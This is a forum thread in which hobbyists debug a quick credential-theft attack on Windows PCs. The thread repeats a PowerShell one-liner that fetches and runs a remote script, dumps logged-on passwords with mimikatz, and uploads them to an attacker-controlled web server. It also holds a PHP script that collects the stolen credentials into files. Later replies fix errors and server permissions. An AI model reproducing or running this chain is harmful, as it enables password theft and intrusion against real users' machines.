Jump to content

15 Second Mr. Robot Hack question


Recommended Posts

So thanks to ThoughtfulDev I was able to get this workings very nicely.

So after testing it on mine and my cousinsg Windows 7 PC(With his permission of course), those worked great, but when testing with our Windows 10 PC's, I got an error.

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

I tried this on a few other Windows 10 PC's to make sure it wasn't just those PC's in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.

Link to post
Share on other sites

so, from the Minikatz github site:
https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).


Are you sure your running it as Administrator?
Link to post
Share on other sites
On 9/6/2017 at 11:00 PM, kdodge said:

 

Are you sure your running it as Administrator?

100% Positive. I'm doing it from my Windows10 Laptop, running this script from an administrator command prompt.

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the Output I put in my first post.

Link to post
Share on other sites

It could be a bug, you might try contacting the author.

One other thing I can think of, are you running an AV? the description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. I kinda sounds like something is anyway.

Link to post
Share on other sites
1 hour ago, kdodge said:

It could be a bug, you might try contacting the author.

One other thing I can think of, are you running an AV? the description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. I kinda sounds like something is anyway.

I am but that is disabled. I know the AV Detects it.

Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it.

Edited by Exmix
Link to post
Share on other sites
  • 2 months later...

I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: 

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
?>

 

it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference):

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

file_put_contents($file, file_get_contents("php://input"));
?>
 

Thanks to any who reply!

Link to post
Share on other sites

It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
?>

run tcpdump with this to see if it's not writable.

Link to post
Share on other sites
On 11/19/2017 at 1:25 PM, kdodge said:

It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on


<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
?>

run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

 

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

Edited by TeCHemically
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...